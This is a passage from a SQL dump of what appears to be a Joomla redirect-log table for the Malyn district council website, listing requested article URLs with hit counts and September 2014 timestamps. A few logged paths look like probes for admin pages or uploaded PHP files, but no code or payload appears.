00:00:00',301),(3933,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-21 21:15:27','0000-00-00 00:00:00',301),(3934,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1052:2013-07-19-11-32-33&catid=51&Itemid=92&lang=ru','','','',4,0,'2014-09-21 21:15:40','0000-00-00 00:00:00',301),(3935,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47:-21022013-&Itemid=86&lang=uk','','','',1,0,'2014-09-21 21:16:06','0000-00-00 00:00:00',301),(3936,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1210:2014-02-03-13-20-51&catid=56&Itemid=97&lang=ru','','','',4,0,'2014-09-21 21:16:08','0000-00-00 00:00:00',301),(3937,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-21 21:16:18','0000-00-00 00:00:00',301),(3938,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-21 21:18:54','0000-00-00 00:00:00',301),(3939,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1323:2014-05-27-13-21-50&catid=36&Itemid=70&lang=en','','','',1,0,'2014-09-21 21:19:56','0000-00-00 00:00:00',301),(3940,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-21 21:24:18','0000-00-00 00:00:00',301),(3941,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-21 21:25:18','0000-00-00 00:00:00',301),(3942,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-21 21:25:23','0000-00-00 00:00:00',301),(3943,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-21 21:30:20','0000-00-00 00:00:00',301),(3944,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=971:-2012-&catid=49&Itemid=88&lang=uk','','','',2,0,'2014-09-21 21:42:14','0000-00-00 00:00:00',301),(3945,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10&Itemid=17&lang=en','','','',4,0,'2014-09-21 21:44:57','0000-00-00 00:00:00',301),(3946,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-21 21:45:40','0000-00-00 00:00:00',301),(3947,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46:--21122012&Itemid=85&lang=uk','','','',4,0,'2014-09-21 21:48:15','0000-00-00 00:00:00',301),(3948,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&catid=36&Itemid=70&lang=ru','','','',4,0,'2014-09-21 21:49:41','0000-00-00 00:00:00',301),(3949,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-21 22:02:51','0000-00-00 00:00:00',301),(3950,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',1,0,'2014-09-21 22:04:42','0000-00-00 00:00:00',301),(3951,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=56&Itemid=97&lang=en','','','',8,0,'2014-09-21 22:24:33','0000-00-00 00:00:00',301),(3952,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-21 22:32:06','0000-00-00 00:00:00',301),(3953,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1378:2014-08-27-11-29-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-21 22:36:55','0000-00-00 00:00:00',301),(3954,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1205:2014-01-31-07-53-03&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',6,0,'2014-09-21 22:40:50','0000-00-00 00:00:00',301),(3955,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',3,0,'2014-09-21 22:41:59','0000-00-00 00:00:00',301),(3956,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-21 22:50:40','0000-00-00 00:00:00',301),(3957,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:--qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=uk','','','',4,0,'2014-09-21 22:57:31','0000-00-00 00:00:00',301),(3958,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1271:2014-04-09-05-14-20&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',2,0,'2014-09-21 22:57:36','0000-00-00 00:00:00',301),(3959,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:-qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',4,0,'2014-09-21 23:01:34','0000-00-00 00:00:00',301),(3960,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=uk','','','',4,0,'2014-09-21 23:41:00','0000-00-00 00:00:00',301),(3961,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-21 23:41:45','0000-00-00 00:00:00',301),(3962,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-21 23:47:25','0000-00-00 00:00:00',301),(3963,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1209:-----2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-21 23:47:26','0000-00-00 00:00:00',301),(3964,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56&Itemid=97&lang=ru','','','',11,0,'2014-09-21 23:51:53','0000-00-00 00:00:00',301),(3965,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1363:--qq&catid=11&Itemid=14&lang=en','','','',5,0,'2014-09-22 00:05:32','0000-00-00 00:00:00',301),(3966,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1106:--qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',1,0,'2014-09-22 00:10:43','0000-00-00 00:00:00',301),(3967,'http://malyn-rayrada.org.ua/user','','','',34,0,'2014-09-22 00:12:36','0000-00-00 00:00:00',301),(3968,'http://malyn-rayrada.org.ua/admin.php','','','',60,0,'2014-09-22 00:12:37','0000-00-00 00:00:00',301),(3969,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-22 00:23:04','0000-00-00 00:00:00',301),(3970,'http://www.malyn-rayrada.org.ua/images/stories/mark2.php','','','',3,0,'2014-09-22 00:31:53','0000-00-00 00:00:00',301),(3971,'http://www.malyn-rayrada.org.ua/images/stories/888.php','','','',1,0,'2014-09-22 00:34:10','0000-00-00 00:00:00',301),(3972,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-22 00:42:52','0000-00-00 00:00:00',301),(3973,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51&Itemid=92&lang=uk','','','',5,0,'2014-09-22 00:42:55','0000-00-00 00:00:00',301),(3974,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51&Itemid=92&lang=ru','','','',9,0,'2014-09-22 00:45:09','0000-00-00 00:00:00',301),(3975,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1351:-2014-&catid=59&Itemid=107&lang=en','','','',3,0,'2014-09-22 00:46:20','0000-00-00 00:00:00',301),(3976,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=3&layout=blog&Itemid=7&lang=ru','','','',1,0,'2014-09-22 00:51:03','0000-00-00 00:00:00',301),(3977,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-09-22 00:56:03','0000-00-00 00:00:00',301),(3978,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53&Itemid=94&lang=uk','','','',6,0,'2014-09-22 01:12:07','0000-00-00 00:00:00',301),(3979,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-09-22 01:13:37','0000-00-00 00:00:00',301),(3980,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=3&Itemid=7&lang=ru','','','',6,0,'2014-09-22 01:19:42','0000-00-00 00:00:00',301),(3981,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-22 01:24:11','0000-00-00 00:00:00',301),(3982,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-22 01:24:31','0000-00-00 00:00:00',301),(3983,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1235:2014-03-06-13-25-26&catid=11&lang=ru','','','',4,0,'2014-09-22 01:24:32','0000-00-00 00:00:00',301),(3984,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:--------------------2014-&Itemid=70&lang=en','','','',2,0,'2014-09-22 01:24:33','0000-00-00 00:00:00',301),(3985,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1203:-2014-&Itemid=97&lang=en','','','',2,0,'2014-09-22 01:24:34','0000-00-00 00:00:00',301),(3986,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&Itemid=97&lang=uk','','','',2,0,'2014-09-22 01:24:35','0000-00-00 00:00:00',301),(3987,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56&Itemid=97&lang=uk','','','',6,0,'2014-09-22 01:24:37','0000-00-00 00:00:00',301),(3988,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56&Itemid=97&lang=uk','','','',14,0,'2014-09-22 01:24:39','0000-00-00 00:00:00',301),(3989,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56&Itemid=97&lang=ru','','','',6,0,'2014-09-22 01:24:40','0000-00-00 00:00:00',301),(3990,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',10,0,'2014-09-22 01:24:42','0000-00-00 00:00:00',301),(3991,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-22 01:24:43','0000-00-00 00:00:00',301),(3992,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-22 01:24:44','0000-00-00 00:00:00',301),(3993,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',20,0,'2014-09-22 01:24:45','0000-00-00 00:00:00',301),(3994,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',14,0,'2014-09-22 01:24:46','0000-00-00 00:00:00',301),(3995,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1188:2014-01-28-09-45-21&Itemid=97&lang=en','','','',1,0,'2014-09-22 01:24:48','0000-00-00 00:00:00',301),(3996,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56&Itemid=97&lang=uk','','','',10,0,'2014-09-22 01:24:49','0000-00-00 00:00:00',301),(3997,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1185:2014-01-28-09-38-54&Itemid=97&lang=uk','','','',1,0,'2014-09-22 01:24:50','0000-00-00 00:00:00',301),(3998,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1182:2014-01-23-06-45-09&catid=11&lang=ru','','','',4,0,'2014-09-22 01:24:52','0000-00-00 00:00:00',301),(3999,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-22 01:24:56','0000-00-00 00:00:00',301),(4000,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11&lang=ru','','','',3,0,'2014-09-22 01:25:12','0000-00-00 00:00:00',301),(4001,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1061:2013-07-29-08-58-16&catid=11&lang=ru','','','',3,0,'2014-09-22 01:25:21','0000-00-00 00:00:00',301),(4002,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&Itemid=92&lang=uk','','','',2,0,'2014-09-22 01:25:22','0000-00-00 00:00:00',301),(4003,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&Itemid=92&lang=ru','','','',2,0,'2014-09-22 01:25:23','0000-00-00 00:00:00',301),(4004,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&lang=ru','','','',3,0,'2014-09-22 01:25:28','0000-00-00 00:00:00',301),(4005,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',22,0,'2014-09-22 01:25:55','0000-00-00 00:00:00',301),(4006,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&Itemid=14&lang=uk','','','',5,0,'2014-09-22 01:25:56','0000-00-00 00:00:00',301),(4007,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1373:2014-08-07-11-39-57&catid=11&Itemid=14&lang=ru','','','',7,0,'2014-09-22 01:29:02','0000-00-00 00:00:00',301),(4008,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-22 01:29:09','0000-00-00 00:00:00',301),(4009,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53&Itemid=94&lang=ru','','','',3,0,'2014-09-22 01:37:59','0000-00-00 00:00:00',301),(4010,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-22 01:42:20','0000-00-00 00:00:00',301),(4011,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49:--12042013-&Itemid=88&lang=en','','','',3,0,'2014-09-22 02:01:15','0000-00-00 00:00:00',301),(4012,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1138:-15112013&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',3,0,'2014-09-22 02:02:12','0000-00-00 00:00:00',301),(4013,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53:--25102013-&Itemid=94&lang=uk','','','',3,0,'2014-09-22 02:28:02','0000-00-00 00:00:00',301),(4014,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=uk','','','',4,0,'2014-09-22 02:28:23','0000-00-00 00:00:00',301),(4015,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56:--03022014-&Itemid=97&lang=ru','','','',13,0,'2014-09-22 03:21:06','0000-00-00 00:00:00',301),(4016,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-09-22 03:25:19','0000-00-00 00:00:00',301),(4017,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-22 03:25:26','0000-00-00 00:00:00',301),(4018,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-22 03:29:46','0000-00-00 00:00:00',301),(4019,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-22 03:29:51','0000-00-00 00:00:00',301),(4020,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-22 03:29:54','0000-00-00 00:00:00',301),(4021,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54&Itemid=95&lang=en','','','',6,0,'2014-09-22 03:30:05','0000-00-00 00:00:00',301),(4022,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46&Itemid=85&lang=en','','','',1,0,'2014-09-22 03:30:43','0000-00-00 00:00:00',301),(4023,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49&Itemid=88&lang=en','','','',1,0,'2014-09-22 03:31:09','0000-00-00 00:00:00',301),(4024,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1176:--27----&catid=11&Itemid=14&lang=en','','','',1,0,'2014-09-22 03:31:44','0000-00-00 00:00:00',301),(4025,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53:--25102013-&Itemid=94&lang=en','','','',2,0,'2014-09-22 03:32:15','0000-00-00 00:00:00',301),(4026,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=en','','','',2,0,'2014-09-22 03:32:19','0000-00-00 00:00:00',301),(4027,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1103:2013-10-03-09-29-30&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1103%3A2013-10-03-09-29-30&lang=uk&option=com_content&view=artic','',5,0,'2014-09-22 03:43:35','0000-00-00 00:00:00',301),(4028,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-22 03:45:03','0000-00-00 00:00:00',301),(4029,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-22 03:45:09','0000-00-00 00:00:00',301),(4030,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=930:2013-02-21-09-13-00&catid=47:-21022013-&Itemid=86&lang=en','','','',8,0,'2014-09-22 03:46:00','0000-00-00 00:00:00',301),(4031,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-22 03:49:12','0000-00-00 00:00:00',301),(4032,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54&Itemid=95&lang=en','','','',2,0,'2014-09-22 03:51:21','0000-00-00 00:00:00',301),(4033,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46:--21122012&Itemid=85&lang=en','','','',1,0,'2014-09-22 03:59:09','0000-00-00 00:00:00',301),(4034,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49:--12042013-&Itemid=88&lang=en','','','',2,0,'2014-09-22 04:00:39','0000-00-00 00:00:00',301),(4035,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2014-09-22 04:02:08','0000-00-00 00:00:00',301),(4036,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-22 04:02:35','0000-00-00 00:00:00',301),(4037,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46:--21122012&Itemid=85&lang=en','','','',4,0,'2014-09-22 04:13:06','0000-00-00 00:00:00',301),(4038,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:-21022013-&Itemid=86&lang=en','','','',3,0,'2014-09-22 04:14:51','0000-00-00 00:00:00',301),(4039,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-22 04:18:24','0000-00-00 00:00:00',301),(4040,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1144:-lr&catid=54:--29112013-&Itemid=95&lang=en','','','',3,0,'2014-09-22 04:19:49','0000-00-00 00:00:00',301),(4041,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-22 04:28:51','0000-00-00 00:00:00',301),(4042,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-22 04:28:59','0000-00-00 00:00:00',301),(4043,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:------------2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-22 04:44:37','0000-00-00 00:00:00',301),(4044,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49&Itemid=88&lang=uk','','','',4,0,'2014-09-22 04:45:39','0000-00-00 00:00:00',301),(4045,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-22 04:47:40','0000-00-00 00:00:00',301),(4046,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49&Itemid=88&lang=uk','','','',14,0,'2014-09-22 04:48:45','0000-00-00 00:00:00',301),(4047,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=990:-2013-&catid=11&Itemid=14&lang=uk','','','',14,0,'2014-09-22 05:03:42','0000-00-00 00:00:00',301),(4048,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-22 05:05:18','0000-00-00 00:00:00',301),(4049,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=988:-2013-&catid=49:--12042013-&Itemid=88&lang=uk','','','',4,0,'2014-09-22 05:18:54','0000-00-00 00:00:00',301),(4050,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-22 05:22:18','0000-00-00 00:00:00',301),(4051,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-22 05:22:22','0000-00-00 00:00:00',301),(4052,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&catid=53:--25102013-&Itemid=94&lang=en','','','',3,0,'2014-09-22 05:22:51','0000-00-00 00:00:00',301),(4053,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-22 05:22:57','0000-00-00 00:00:00',301),(4054,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-22 05:27:23','0000-00-00 00:00:00',301),(4055,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1139:---------14112013--84-l--25-----6-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-22 05:33:41','0000-00-00 00:00:00',301),(4056,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47&Itemid=86&lang=uk','','','',1,0,'2014-09-22 05:35:26','0000-00-00 00:00:00',301),(4057,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-22 05:35:43','0000-00-00 00:00:00',301),(4058,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-22 05:36:48','0000-00-00 00:00:00',301),(4059,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53&Itemid=94&lang=en','','','',8,0,'2014-09-22 05:43:24','0000-00-00 00:00:00',301),(4060,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1338:2014-06-11-14-18-06&catid=11&Itemid=14&lang=en','','','',2,0,'2014-09-22 05:43:47','0000-00-00 00:00:00',301),(4061,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53&Itemid=94&lang=uk','','','',2,0,'2014-09-22 05:46:34','0000-00-00 00:00:00',301),(4062,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&catid=10&Itemid=17&lang=uk','','','',3,0,'2014-09-22 05:46:43','0000-00-00 00:00:00',301),(4063,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-22 05:46:52','0000-00-00 00:00:00',301),(4064,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=949:2013-03-06-12-51-36&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-22 05:47:44','0000-00-00 00:00:00',301),(4065,'http://malyn-rayrada.org.ua/index.php?option=com_poll&id=10:2013-02-22-07-29-10&lang=en','','','',1,0,'2014-09-22 05:47:53','0000-00-00 00:00:00',301),(4066,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1081:-2013-2017-&catid=53:--25102013-&Itemid=94&lang=en','','','',5,0,'2014-09-22 05:48:20','0000-00-00 00:00:00',301),(4067,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1119:2013-10-25-12-26-37&catid=53:--25102013-&Itemid=94&lang=ru','','','',12,0,'2014-09-22 05:49:32','0000-00-00 00:00:00',301),(4068,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1228:2014-02-27-14-42-41&catid=11&Itemid=14&lang=ru','','','',1,0,'2014-09-22 05:49:56','0000-00-00 00:00:00',301),(4069,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1001:2013-04-30-12-14-17&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-22 05:50:20','0000-00-00 00:00:00',301),(4070,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-22 05:51:04','0000-00-00 00:00:00',301),(4071,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-22 05:52:18','0000-00-00 